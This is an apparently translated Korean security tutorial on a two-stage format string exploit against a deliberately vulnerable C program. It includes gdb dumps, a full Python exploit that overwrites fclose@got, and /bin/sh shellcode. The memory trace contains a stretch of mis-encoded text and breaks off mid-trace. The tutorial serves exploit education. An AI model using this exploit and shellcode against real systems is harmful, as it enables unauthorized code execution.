Since 2002. W / I / S / E / G / U / Y / S in HackerSchool
http://research.hackerschool.org   wiseguys@hackerschool.org
Designed by FiaDot

[Document Information]
:: Title   :: Double Staged Format String Attack
:: Date    :: 2012. 8. 14
:: Author  :: pwn3r
:: Editor  :: pwn3r
:: Contact :: E-Mail(austinkwon2@gmail.com)  Homepage(http://pwn3r.tistory.com)

[Notice]
Copyright of this document belongs to the author and WiseGuys. It may be used for any purpose other than a commercial one (copying, quoting, modifying, distributing); commercial use without the consent of WiseGuys is prohibited. The copyright holder accepts no responsibility for any incident arising from this document. Please e-mail the author with corrections, comments or additions.

[Index]
0x00. Intro
0x01. Normal Format String Bug
0x02. Double Staged Format String Attack
0x03. Exploitation case
0x04. Conclusion

[0x00 Intro]
The technique introduced in this document is one of the Format String Bug exploitation techniques devised by mongii, the superhacker who drops a new technique at every contest.
It looked like a technique that is handy not only for contest problems but also when attacking real-world bugs, so I decided to write it up.

* This document only renders properly when read in Notepad in the Gulim font -_-; For convenience I will drop the honorific style.

[0x01 Normal Format String Bug]
As a formality, let us first look at how a normal Format String Bug (FSB) is exploited. Take the usual FSB scenario as an example.

----------------------------------------
#include <stdio.h>

FILE *fp;

int main()
{
    char buf[1024];
    fgets(buf , 1024 , stdin);
    fp = fopen("/tmp/trash" , "w");
    fprintf(fp , buf);
    fclose(fp);
    return 0;
}
----------------------------------------

This program has an FSB vulnerability you can spot in 0.3 seconds. It reads up to 1024 bytes into the local variable buf with fgets and then prints it with fprintf using buf itself as the format string, so a Format String Bug arises. A program with an FSB of this shape has attacker-controllable values on the stack, so those values can be used as the directives' arguments to overwrite a value at any desired address conveniently.
-----------------------------------------------------------------------------
(gdb) r
Starting program: /home/pwn3r/DSFSA/test2
aaaabbbbcccc

Breakpoint 1, 0x08048587 in main ()
(gdb) x/i $eip
=> 0x8048587 :    call   0x8048444
(gdb) x/100x $esp
0xbffff330: 0x0804b008 0xbffff34c 0x00294440 0x00000006
0xbffff340: 0x00000004 0x00000004 0x00000174 0x61616161
0xbffff350: 0x62626262 0x63636363 0x0000000a 0x00000004
0xbffff360: 0x00000004 0x00000007 0x001531c8 0x001541c8
0xbffff370: 0x001541c8 0x00000008 0x00000040 0x00000004
0xbffff380: 0x00000004 0x6474e550 0x0013b4dc 0x0013b4dc
0xbffff390: 0x0013b4dc 0x0000332c 0x0000332c 0x00000004
0xbffff3a0: 0x00000004 0x6474e551 0x00000000 0x00000000
0xbffff3b0: 0x00000000 0x00000000 0x00000000 0x00000006
0xbffff3c0: 0x00000004 0x6474e552 0x001531c8 0x001541c8
0xbffff3d0: 0x001541c8 0x00001e38 0x0012bff4 0xbffff61c
0xbffff3e0: 0x00000000 0xbffff40c 0x0011ce9c 0x00000000
0xbffff3f0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffff400: 0x01fe81e7 0x00000000 0x001289d4 0xbffff4ec
0xbffff410: 0x0011d7e6 0xbffff61c 0x00000000 0x0014ade0
0xbffff420: 0x0d696910 0xbffff45c 0x001189f6 0x001507c9
0xbffff430: 0x001105dc 0x0000000e 0x001507b1 0x0012fda8
0xbffff440: 0xbfff0002 0x0011e590 0x001507b1 0x0012fac0
0xbffff450: 0x0012bff4 0x00141d7c 0x00000001 0xbffff4e8
0xbffff460: 0x00118fa6 0x003016a0 0x8e808426 0x24420804
0xbffff470: 0xbffff800 0x0012f838 0x00000000 0x0012bff4
0xbffff480: 0xbffff61c 0x00000000 0x00141db0 0x0012873c
0xbffff490: 0xbffff4b0 0x00124861 0x00000007 0x0014ade0
0xbffff4a0: 0x0012fb1c 0x7c96f087 0x00000000 0x00000003
0xbffff4b0: 0x0012c524 0x00000000 0x00000000 0x00000001
-----------------------------------------------------------------------------

As you can see, the data we typed landed unchanged starting at 0xbffff34c, so when exploiting the Format String Bug it can be used as the directives' arguments and the attack is very simple. But a controllable value is not always present on the stack like this. If there is no controllable data on the stack at all, how would you attack it?
[0x02 Double Staged Format String Attack]
Now let us get into the Double Staged Format String Attack proper. As mentioned in 0x01: if a Format String Bug occurs but there is no value on the stack that we control, how do we exploit the bug? Let us write example code again.

----------------------------------------
#include <stdio.h>

FILE *fp;
char buf[1024];

int main()
{
    fgets(buf , 1024 , stdin);
    fp = fopen("/tmp/trash" , "w");
    fprintf(fp , buf);
    fclose(fp);
    return 0;
}
----------------------------------------

Again the FSB is blatant, but the difference from the source in 0x01 is that buf is now a global variable. This time the input goes only into the global variable and is printed with fprintf using it as the format string. In a local attack you could still exploit this easily by laying out the desired arguments in the environment variable area, but if the binary compiled from this source is running as a daemon and has to be attacked remotely, you genuinely cannot control even a single byte on the stack. Yet this program can be exploited too.

The core of the Double Staged Format String Attack is to use a pointer that is already on the stack: overwrite the memory the pointer points to with the argument I want, and then write the desired value to the address that argument names. That is, split into two stages:

(1) Stage0: use a pointer on the stack to change the value it points to into the "address to overwrite"
(2) Stage1: reference the argument built in Stage0 to overwrite the desired address with the "desired value"

Now let us compile the example code and check how many stack pointers there are in memory. (The Format String Bug occurs in fprintf, so we examine memory just before the fprintf call.)
-----------------------------------------------------------------------------
(gdb) x/i $eip
=> 0x8048516 :    call   0x80483fc
(gdb) x/100x $esp
0xbffff740: 0x0804b008 0x0804a060 0x00284440 0x00283ff4
0xbffff750: 0x08048540 0x00000000 0xbffff7d8 0x00144bd6
0xbffff760: 0x00000001 0xbffff804 0xbffff80c 0xb7fff858
0xbffff770: 0xbffff7c0 0xffffffff 0x0012bff4 0x080482c2
0xbffff780: 0x00000001 0xbffff7c0 0x0011d626 0x0012cab0
0xbffff790: 0xb7fffb48 0x00283ff4 0x00000000 0x00000000
0xbffff7a0: 0xbffff7d8 0x9971399c 0x4e08cee3 0x00000000
0xbffff7b0: 0x00000000 0x00000000 0x00000001 0x08048410
0xbffff7c0: 0x00000000 0x00123230 0x00144afb 0x0012bff4
0xbffff7d0: 0x00000001 0x08048410 0x00000000 0x08048431
0xbffff7e0: 0x080484c4 0x00000001 0xbffff804 0x08048540
0xbffff7f0: 0x08048530 0x0011e030 0xbffff7fc 0x0012c8f8
0xbffff800: 0x00000001 0xbffff924 0x00000000 0xbffff93b
0xbffff810: 0xbffff94b 0xbffff956 0xbffff9a6 0xbffff9c8
0xbffff820: 0xbffff9db 0xbffff9e6 0xbffffe87 0xbffffe93
0xbffff830: 0xbffffee0 0xbffffef5 0xbfffff04 0xbfffff1a
0xbffff840: 0xbfffff2b 0xbfffff34 0xbfffff46 0xbfffff57
0xbffff850: 0xbfffff5f 0xbfffff6d 0xbfffffa3 0xbfffffc3
0xbffff860: 0x00000000 0x00000020 0x0012d420 0x00000021
0xbffff870: 0x0012d000 0x00000010 0x0febf3ff 0x00000006
0xbffff880: 0x00001000 0x00000011 0x00000064 0x00000003
0xbffff890: 0x08048034 0x00000004 0x00000020 0x00000005
0xbffff8a0: 0x00000008 0x00000007 0x00110000 0x00000008
0xbffff8b0: 0x00000000 0x00000009 0x08048410 0x0000000b
0xbffff8c0: 0x000003e8 0x0000000c 0x000003e8 0x0000000d
-----------------------------------------------------------------------------

Quite a few stack pointers stand out. Because a format string pulls stack values in the direction of increasing addresses, a usable pointer must point to an address higher than the one the pointer itself sits at, and the relative distance between the pointer and the address it points to must always be the same (if the relative distance keeps changing, it is hard to use). Let us filter down to the pointers that meet these conditions.
-----------------------------------------------------------------------------
(gdb) x/100x $esp
0xbffff740: .......... .......... .......... ..........
0xbffff750: .......... .......... 0xbffff7d8 ..........
0xbffff760: .......... 0xbffff804 0xbffff80c ..........
0xbffff770: 0xbffff7c0 .......... .......... ..........
0xbffff780: .......... 0xbffff7c0 .......... ..........
0xbffff790: .......... .......... .......... ..........
0xbffff7a0: 0xbffff7d8 .......... .......... ..........
0xbffff7b0: .......... .......... .......... ..........
0xbffff7c0: 0x00000000 .......... .......... ..........
0xbffff7d0: .......... .......... 0x00000000 ..........
0xbffff7e0: .......... .......... 0xbffff804 ..........
0xbffff7f0: .......... .......... 0xbffff7fc 0x0012c8f8
0xbffff800: .......... 0xbffff924 .......... 0xbffff93b
0xbffff810: 0xbffff94b 0xbffff956 0xbffff9a6 0xbffff9c8
0xbffff820: 0xbffff9db 0xbffff9e6 0xbffffe87 0xbffffe93
0xbffff830: 0xbffffee0 0xbffffef5 0xbfffff04 0xbfffff1a
0xbffff840: 0xbfffff2b 0xbfffff34 0xbfffff46 0xbfffff57
0xbffff850: 0xbfffff5f 0xbfffff6d 0xbfffffa3 0xbfffffc3
0xbffff860: .......... .......... .......... ..........
0xbffff870: .......... .......... .......... ..........
0xbffff880: .......... .......... .......... ..........
0xbffff890: .......... .......... .......... ..........
0xbffff8a0: .......... .......... .......... ..........
0xbffff8b0: .......... .......... .......... ..........
0xbffff8c0: .......... .......... .......... ..........
-----------------------------------------------------------------------------

The kind-hearted stack has left plenty of pointers for us. Now let us pick the ones to use. To begin with, the number of pointers we need is two: one to produce fclose@got and the other to produce fclose@got+2.

-----------------------------------------------------------------------------
0xbffff740: .......... .......... .......... ..........
0xbffff750: .......... .......... .......... ..........
0xbffff760: .......... 0xbffff804 .......... ..........
0xbffff770: 0xbffff7c0 .......... .......... ..........
0xbffff780: .......... .......... .......... ..........
0xbffff790: .......... .......... .......... ..........
0xbffff7a0: .......... .......... .......... ..........
0xbffff7b0: .......... .......... .......... ..........
0xbffff7c0: 0x00000000 .......... .......... ..........
0xbffff7d0: .......... .......... .......... ..........
0xbffff7e0: .......... .......... .......... ..........
0xbffff7f0: .......... .......... .......... ..........
0xbffff800: .......... 0xbffff924 .......... ..........
..........................................................................
-----------------------------------------------------------------------------

I arbitrarily chose these two pointers (0xbffff804, 0xbffff7c0). Looking at them now, the relative distances are not that large either. So, taking as the final goal overwriting the arbitrary address 0x08049ffc with the arbitrary value 0xdeadbeef, let us design the payload split into stages as described above.

Stage0
-----------------------------------------------------------------------------
0x08049ffc: 0x0012ffc0

0xbffff740: .......... .......... .......... ..........
0xbffff750: .......... .......... .......... ..........
0xbffff760: .......... 0xbffff804 (%n) .......... ..........
0xbffff770: 0xbffff7c0 .......... .......... ..........
0xbffff780: .......... .......... .......... ..........
0xbffff790: .......... .......... .......... ..........
0xbffff7a0: .......... .......... .......... ..........
0xbffff7b0: .......... .......... .......... ..........
0xbffff7c0: 0x00000000 .......... .......... ..........
0xbffff7d0: .......... .......... .......... ..........
0xbffff7e0: .......... .......... .......... ..........
0xbffff7f0: .......... .......... .......... ..........
0xbffff800: .......... 0x08049ffc .......... ..........
..........................................................................
-----------------------------------------------------------------------------

Stage0 is the step that uses the two stack pointers to build, further up the stack, the address values Stage1 will use. In the log above, using the %n directive at the slot holding the pointer to 0xbffff804 wrote the address value 0x08049ffc into memory at 0xbffff804.

Stage0
-----------------------------------------------------------------------------
0x08049ffc: 0x0012ffc0

0xbffff740: .......... .......... .......... ..........
0xbffff750: .......... .......... .......... ..........
0xbffff760: .......... 0xbffff804 .......... ..........
0xbffff770: 0xbffff7c0 (%n) .......... .......... ..........
0xbffff780: .......... .......... .......... ..........
0xbffff790: .......... .......... .......... ..........
0xbffff7a0: .......... .......... .......... ..........
0xbffff7b0: .......... .......... .......... ..........
0xbffff7c0: 0x08049ffe .......... .......... ..........
0xbffff7d0: .......... .......... .......... ..........
0xbffff7e0: .......... .......... .......... ..........
0xbffff7f0: .......... .......... .......... ..........
0xbffff800: .......... 0x08049ffc .......... ..........
..........................................................................
-----------------------------------------------------------------------------

This time, using %n at the slot holding the pointer 0xbffff7c0 wrote the address value 0x08049ffe into memory at 0xbffff7c0.

Stage1
-----------------------------------------------------------------------------
0x08049ffc: 0xdeadffc0

0xbffff740: .......... .......... .......... ..........
0xbffff750: .......... .......... .......... ..........
0xbffff760: .......... 0xbffff804 .......... ..........
0xbffff770: 0xbffff7c0 .......... .......... ..........
0xbffff780: .......... .......... .......... ..........
0xbffff790: .......... .......... .......... ..........
0xbffff7a0: .......... .......... .......... ..........
0xbffff7b0: .......... .......... .......... ..........
0xbffff7c0: 0x08049ffe (%hn) .......... .......... ..........
0xbffff7d0: .......... .......... .......... ..........
0xbffff7e0: .......... .......... .......... ..........
0xbffff7f0: .......... .......... .......... ..........
0xbffff800: .......... 0x08049ffc .......... ..........
..........................................................................
-----------------------------------------------------------------------------

Stage1 is the step that uses the address values Stage0 built on the stack to overwrite the target address. Using %hn at the slot holding the 0x08049ffe built a moment ago overwrote the value at that address.

Stage1
-----------------------------------------------------------------------------
0x08049ffc: 0xdeadbeef

0xbffff740: .......... .......... .......... ..........
0xbffff750: .......... .......... .......... ..........
0xbffff760: .......... 0xbffff804 .......... ..........
0xbffff770: 0xbffff7c0 .......... .......... ..........
0xbffff780: .......... .......... .......... ..........
0xbffff790: .......... .......... .......... ..........
0xbffff7a0: .......... .......... .......... ..........
0xbffff7b0: .......... .......... .......... ..........
0xbffff7c0: 0x08049ffe .......... .......... ..........
0xbffff7d0: .......... .......... .......... ..........
0xbffff7e0: .......... .......... .......... ..........
0xbffff7f0: .......... .......... .......... ..........
0xbffff800: .......... 0x08049ffc (%hn) .......... ..........
..........................................................................
-----------------------------------------------------------------------------

This time, using %hn at the slot holding 0x08049ffc overwrote the value at that address, and with that the 4 bytes at 0x08049ffc have been changed to 0xdeadbeef.
The principle itself is dead simple, but it looks pretty slick when you actually use it -_-b

[0x03 Exploitation Case]
(* This can be solved more simply than the walkthrough below, but to aid understanding I will take a slightly roundabout route.)

----------------------------------------
#include <stdio.h>

FILE *fp;
char buf[1024];

int main()
{
    fgets(buf , 1024 , stdin);
    fp = fopen("/tmp/trash" , "w");
    fprintf(fp , buf);
    fclose(fp);
    return 0;
}
----------------------------------------

We will exploit the test code written in 0x02 as it is. Since what this document sets out to explain is not a technique for bypassing memory protections, the explanation proceeds with NX turned off. As seen in 0x02 there are several stack pointers, and two of them were picked arbitrarily for use in the exploit.

-----------------------------------------------------------------------------
0xbffff740: .......... .......... .......... ..........
0xbffff750: .......... .......... .......... ..........
0xbffff760: .......... 0xbffff804 .......... ..........
0xbffff770: 0xbffff7c0 .......... .......... ..........
0xbffff780: .......... .......... .......... ..........
0xbffff790: .......... .......... .......... ..........
0xbffff7a0: .......... .......... .......... ..........
0xbffff7b0: .......... .......... .......... ..........
0xbffff7c0: 0x00000000 .......... .......... ..........
0xbffff7d0: .......... .......... .......... ..........
0xbffff7e0: .......... .......... .......... ..........
0xbffff7f0: .......... .......... .......... ..........
0xbffff800: .......... 0xbffff924 .......... ..........
..........................................................................
-----------------------------------------------------------------------------

Thankfully the program reads its input into a global variable, so the input lands at a fixed memory address; we will exploit it by placing SHELLCODE in that memory and redirecting EIP there. The method used to take control of EIP is overwriting fclose@got with the address of the SHELLCODE. The process of building the payload was explained in 0x02, so rather than explaining it again, I will walk through the exploit I already wrote. The final exploit is below.

(* fclose@got is 0x0804a00c, and 0x0804a2a0 will be used as the shellcode address written into fclose@got.)

-----------------------------------------------------------------------------
#!/usr/bin/python
from struct import pack

# fclose@got = 0x0804a00c
# shellcode addr = 0x0804a2a0

stage_0 = ""
stage_0 += "%8x" * 6           # count = 48 (0x30)
stage_0 += "%134520796x"       # count = 134520844 (0x0804a00c) ; For fclose@got
stage_0 += "%n"
stage_0 += "%c" * 2            # count = 134520846 (0x0804a00e) ; For fclose@got + 2
stage_0 += "%n"

stage_1 = ""
stage_1 += "%24562x"           # count = 134545408 (0x08050000) ; For 0x0000
stage_1 += "%8x" * 17          # count = 134545544 (0x08050088) ; length = 136
stage_1 += "%1916x"            # count = 134547460 (0x08050804) ; For 0x0804
stage_1 += "%hn"
stage_1 += "%8x" * 15          # count = 134547580 (0x0805087c) ; length = 120
stage_1 += "%39460x"           # count = 134587040 (0x0805a2a0) ; For 0xa2a0
stage_1 += "%hn"

SHELLCODE = ""
SHELLCODE += "\x90" * (1024 - len(stage_0+stage_1) - 25 - 1)   # 25 = length of shellcode
SHELLCODE += "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"   # execve("/bin/sh" , {"sh"} , 0) shellcode

payload = stage_0 + stage_1 + SHELLCODE

print payload
-----------------------------------------------------------------------------

The payload breaks down broadly into three parts: Stage0, Stage1, and NOP + SHELLCODE.
NOP + SHELLCODE is the shellcode that will ultimately be executed; as explained above, stage0 is the part that builds the arguments stage1 will use, and stage1 is the part that actually overwrites data at the target address. I will now walk through how the exploit above operates. The explanation follows the changes in memory as the format string exploit runs inside fprintf.

(* A format directive shown in parentheses has already been consumed)
(* count is the number of characters output so far)

-----------------------------------------------------------------------------
count = 0
fclose@got (0x0804a00c) = 0x080483e2

0xbffff740: .......... .......... .......... ..........   // %8x %8x
0xbffff750: .......... .......... .......... ..........   // %8x %8x %8x %8x
0xbffff760: .......... 0xbffff804 .......... ..........   // %134520796x %n %c %c
0xbffff770: 0xbffff7c0 .......... .......... ..........   // %n %24562x %8x %8x
0xbffff780: .......... .......... .......... ..........   // %8x %8x %8x %8x
0xbffff790: .......... .......... .......... ..........   // %8x %8x %8x %8x
0xbffff7a0: .......... .......... .......... ..........   // %8x %8x %8x %8x
0xbffff7b0: .......... .......... .......... ..........   // %8x %8x %8x %1916x
0xbffff7c0: 0x00000000 .......... .......... ..........   // %hn %8x %8x %8x
0xbffff7d0: .......... .......... .......... ..........   // %8x %8x %8x %8x
0xbffff7e0: .......... .......... .......... ..........   // %8x %8x %8x %8x
0xbffff7f0: .......... .......... .......... ..........   // %8x %8x %8x %8x
0xbffff800: .......... 0xbffff924 .......... ..........   // %39460x %hn
..........................................................................
-----------------------------------------------------------------------------

Initially the address in fclose@got is 0x080483e2, which corresponds to fclose@plt+6. No format directive has been consumed yet.

-----------------------------------------------------------------------------
count = 134520844 (0x0804a00c)   // 0x0 -> 0x0804a00c
fclose@got (0x0804a00c) = 0x080483e2

0xbffff740: .......... .......... .......... ..........   // (%8x) (%8x)
0xbffff750: .......... .......... .......... ..........   // (%8x) (%8x) (%8x) (%8x)
0xbffff760: .......... 0xbffff804 .......... ..........   // (%134520796x) %n %c %c
0xbffff770: 0xbffff7c0 .......... .......... ..........   // %n %24562x %8x %8x
0xbffff780: .......... .......... .......... ..........   // %8x %8x %8x %8x
0xbffff790: .......... .......... .......... ..........   // %8x %8x %8x %8x
0xbffff7a0: .......... .......... .......... ..........   // %8x %8x %8x %8x
0xbffff7b0: .......... .......... .......... ..........   // %8x %8x %8x %1916x
0xbffff7c0: 0x00000000 .......... .......... ..........   // %hn %8x %8x %8x
0xbffff7d0: .......... .......... .......... ..........   // %8x %8x %8x %8x
0xbffff7e0: .......... .......... .......... ..........   // %8x %8x %8x %8x
0xbffff7f0: .......... .......... .......... ..........   // %8x %8x %8x %8x
0xbffff800: .......... 0xbffff924 .......... ..........   // %39460x %hn
..........................................................................
-----------------------------------------------------------------------------

First the six "%8x" and the "%134520796x" directives are consumed, so the count of characters output becomes 0x0804a00c. This is the part that makes the output count equal to 0x0804a00c (fclose@got).

-----------------------------------------------------------------------------
count = 134520844 (0x0804a00c)
fclose@got (0x0804a00c) = 0x080483e2

0xbffff740: .......... .......... .......... ..........   // (%8x) (%8x)
0xbffff750: .......... .......... .......... ..........   // (%8x) (%8x) (%8x) (%8x)
0xbffff760: .......... 0xbffff804 .......... ..........   // (%134520796x) (%n) %c %c
0xbffff770: 0xbffff7c0 .......... .......... ..........   // %n %24562x %8x %8x
0xbffff780: .......... .......... .......... ..........   // %8x %8x %8x %8x
0xbffff790: .......... .......... .......... ..........   // %8x %8x %8x %8x
0xbffff7a0: .......... .......... .......... ..........   // %8x %8x %8x %8x
0xbffff7b0: .......... .......... .......... ..........   // %8x %8x %8x %1916x
0xbffff7c0: 0x00000000 .......... .......... ..........   // %hn %8x %8x %8x
0xbffff7d0: .......... .......... .......... ..........   // %8x %8x %8x %8x
0xbffff7e0: .......... .......... .......... ..........   // %8x %8x %8x %8x
0xbffff7f0: .......... .......... .......... ..........   // %8x %8x %8x %8x
0xbffff800: .......... 0x0804a00c .......... ..........   // %39460x %hn   (*changed*)
..........................................................................
-----------------------------------------------------------------------------

"%n" is used at the slot holding the stack pointer. Because of "%n", the count of characters output so far, 0x0804a00c, is written into the memory the stack pointer points to (0xbffff804).

-----------------------------------------------------------------------------
count = 134520846 (0x0804a00e)   // 0x0804a00c -> 0x0804a00e
fclose@got (0x0804a00c) = 0x080483e2

0xbffff740: .......... .......... .......... ..........   // (%8x) (%8x)
0xbffff750: .......... .......... .......... ..........   // (%8x) (%8x) (%8x) (%8x)
0xbffff760: .......... 0xbffff804 .......... ..........   // (%134520796x) (%n) (%c) (%c)
0xbffff770: 0xbffff7c0 .......... .......... ..........   // %n %24562x %8x %8x
0xbffff780: .......... .......... .......... ..........   // %8x %8x %8x %8x
0xbffff790: .......... .......... .......... ..........   // %8x %8x %8x %8x
0xbffff7a0: .......... .......... .......... ..........   // %8x %8x %8x %8x
0xbffff7b0: .......... .......... .......... ..........   // %8x %8x %8x %1916x
0xbffff7c0: 0x00000000 .......... .......... ..........   // %hn %8x %8x %8x
0xbffff7d0: .......... .......... .......... ..........   // %8x %8x %8x %8x
0xbffff7e0: .......... .......... .......... ..........   // %8x %8x %8x %8x
0xbffff7f0: .......... .......... .......... ..........   // %8x %8x %8x %8x
0xbffff800: .......... 0x0804a00c .......... ..........   // %39460x %hn
..........................................................................
----------------------------------------------------------------------------- 2°³ÀÇ "%c" Æ÷¸Ë½ºÆ®¸µÀÌ »ç¿ëµÇ¾î Ãâ·ÂµÈ ±ÛÀÚÀÇ count°¡ 2Áõ°¡ÇØ 0x0804a00e°¡ µÇ¾ú´Ù. Ãâ·ÂµÈ ±ÛÀÚÀÇ count¸¦ fclose@got+2·Î ¸¸µé¾îÁÖ´Â ºÎºÐÀÌ´Ù. ----------------------------------------------------------------------------- count = 134520846 (0x0804a00e) fclose@got (0x0804a00c) = 0x080483e2 0xbffff740: .......... .......... .......... .......... // (%8x) (%8x) 0xbffff750: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x) 0xbffff760: .......... 0xbffff804 .......... .......... // (%134520796x) (%n) (%c) (%c) 0xbffff770: 0xbffff7c0 .......... .......... .......... // (%n) %24562x %8x %8x 0xbffff780: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff790: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff7a0: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff7b0: .......... .......... .......... .......... // %8x %8x %8x %1916x 0xbffff7c0: 0x0804a00e .......... .......... .......... // %hn %8x %8x %8x (*changed*) 0xbffff7d0: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff7e0: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff7f0: .......... .......... .......... .......... // %8x %8x %8x %8x 0xbffff800: .......... 0x0804a00c .......... .......... // %39460x %hn .......................................................................... ----------------------------------------------------------------------------- ¾Æ±î¿Í´Â ´Ù¸¥ ½ºÅÃÆ÷ÀÎÅÍ ÀÚ¸®¿¡¼­ "%n" Æ÷¸Ë½ºÆ®¸µÀ» »ç¿ëÇß´Ù. "%n" Æ÷¸Ë½ºÆ®¸µÀ¸·Î ÀÎÇØ ÇöÀç±îÁö Ãâ·ÂÇÑ ±ÛÀÚÀÇ countÀÎ 0x0804a00e°¡ ½ºÅÃÆ÷ÀÎÅÍ°¡ °¡¸®Å°´Â ¸Þ¸ð¸®(0xbffff7c0)¿¡ µ¤¾î¾º¿öÁ³´Ù. ----------------------------------------------------------------------------- count = 134545408 (0x08050000) // 0x0804a00e -> 0x08050000 fclose@got (0x0804a00c) = 0x080483e2 0xbffff740: .......... .......... .......... .......... // (%8x) (%8x) 0xbffff750: .......... .......... 
.......... .......... // (%8x) (%8x) (%8x) (%8x)
0xbffff760: .......... 0xbffff804 .......... .......... // (%134520796x) (%n) (%c) (%c)
0xbffff770: 0xbffff7c0 .......... .......... .......... // (%n) (%24562x) %8x %8x
0xbffff780: .......... .......... .......... .......... // %8x %8x %8x %8x
0xbffff790: .......... .......... .......... .......... // %8x %8x %8x %8x
0xbffff7a0: .......... .......... .......... .......... // %8x %8x %8x %8x
0xbffff7b0: .......... .......... .......... .......... // %8x %8x %8x %1916x
0xbffff7c0: 0x0804a00e .......... .......... .......... // %hn %8x %8x %8x
0xbffff7d0: .......... .......... .......... .......... // %8x %8x %8x %8x
0xbffff7e0: .......... .......... .......... .......... // %8x %8x %8x %8x
0xbffff7f0: .......... .......... .......... .......... // %8x %8x %8x %8x
0xbffff800: .......... 0x0804a00c .......... .......... // %39460x %hn
..........................................................................
-----------------------------------------------------------------------------

The "%24562x" conversion has been consumed, bringing the count of printed characters to 0x08050000. This step exists only for convenience: it zeroes the low 16 bits of the count so the following widths are easy to compute.

-----------------------------------------------------------------------------
count = 134547460 (0x08050804) // 0x08050000 -> 0x08050804
fclose@got (0x0804a00c) = 0x080483e2

0xbffff740: .......... .......... .......... .......... // (%8x) (%8x)
0xbffff750: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x)
0xbffff760: .......... 0xbffff804 .......... .......... // (%134520796x) (%n) (%c) (%c)
0xbffff770: 0xbffff7c0 .......... .......... .......... // (%n) (%24562x) (%8x) (%8x)
0xbffff780: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x)
0xbffff790: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x)
0xbffff7a0: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x)
0xbffff7b0: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%1916x)
0xbffff7c0: 0x0804a00e .......... .......... .......... // %hn %8x %8x %8x
0xbffff7d0: .......... .......... .......... .......... // %8x %8x %8x %8x
0xbffff7e0: .......... .......... .......... .......... // %8x %8x %8x %8x
0xbffff7f0: .......... .......... .......... .......... // %8x %8x %8x %8x
0xbffff800: .......... 0x0804a00c .......... .......... // %39460x %hn
..........................................................................
-----------------------------------------------------------------------------

Seventeen "%8x" conversions and one "%1916x" have been consumed, bringing the count of printed characters to 0x08050804. This step sets the low 16 bits of the count to 0x0804.

-----------------------------------------------------------------------------
count = 134547460 (0x08050804)
fclose@got (0x0804a00c) = 0x080483e2 // 0x080483e2 -> 0x080483e2
// (0x0804 was written over the upper half of the address, but it was already 0x0804, so the value does not change)
// (this is what was meant at the start by "it could have been done more simply, but I took the long way round")

0xbffff740: .......... .......... .......... .......... // (%8x) (%8x)
0xbffff750: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x)
0xbffff760: .......... 0xbffff804 .......... .......... // (%134520796x) (%n) (%c) (%c)
0xbffff770: 0xbffff7c0 .......... .......... .......... // (%n) (%24562x) (%8x) (%8x)
0xbffff780: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x)
0xbffff790: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x)
0xbffff7a0: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x)
0xbffff7b0: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%1916x)
0xbffff7c0: 0x0804a00e .......... .......... .......... // (%hn) %8x %8x %8x
0xbffff7d0: .......... .......... .......... .......... // %8x %8x %8x %8x
0xbffff7e0: .......... .......... .......... .......... // %8x %8x %8x %8x
0xbffff7f0: .......... .......... .......... .......... // %8x %8x %8x %8x
0xbffff800: .......... 0x0804a00c .......... .......... // %39460x %hn
..........................................................................
-----------------------------------------------------------------------------

At the stack slot holding the fclose@got+2 address prepared in the first stage, the "%hn" conversion is used. "%hn" stores the low 2 bytes (0x0804) of the count printed so far, 0x08050804, into fclose@got+2.

-----------------------------------------------------------------------------
count = 134587040 (0x0805a2a0) // 0x08050804 -> 0x0805a2a0
fclose@got (0x0804a00c) = 0x080483e2

0xbffff740: .......... .......... .......... .......... // (%8x) (%8x)
0xbffff750: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x)
0xbffff760: .......... 0xbffff804 .......... .......... // (%134520796x) (%n) (%c) (%c)
0xbffff770: 0xbffff7c0 .......... .......... .......... // (%n) (%24562x) (%8x) (%8x)
0xbffff780: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x)
0xbffff790: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x)
0xbffff7a0: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x)
0xbffff7b0: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%1916x)
0xbffff7c0: 0x0804a00e .......... .......... .......... // (%hn) (%8x) (%8x) (%8x)
0xbffff7d0: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x)
0xbffff7e0: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x)
0xbffff7f0: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x)
0xbffff800: .......... 0x0804a00c .......... .......... // (%39460x) %hn
..........................................................................
-----------------------------------------------------------------------------

Fifteen "%8x" conversions and one "%39460x" have been consumed, bringing the count of printed characters to 0x0805a2a0. This step sets the low 16 bits of the count to 0xa2a0.

-----------------------------------------------------------------------------
count = 134587040 (0x0805a2a0)
fclose@got (0x0804a00c) = 0x0804a2a0 // 0x080483e2 -> 0x0804a2a0

0xbffff740: .......... .......... .......... .......... // (%8x) (%8x)
0xbffff750: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x)
0xbffff760: .......... 0xbffff804 .......... .......... // (%134520796x) (%n) (%c) (%c)
0xbffff770: 0xbffff7c0 .......... .......... .......... // (%n) (%24562x) (%8x) (%8x)
0xbffff780: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x)
0xbffff790: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x)
0xbffff7a0: .......... .......... .......... .......... // (%8x) (%8x) (%8x) (%8x)
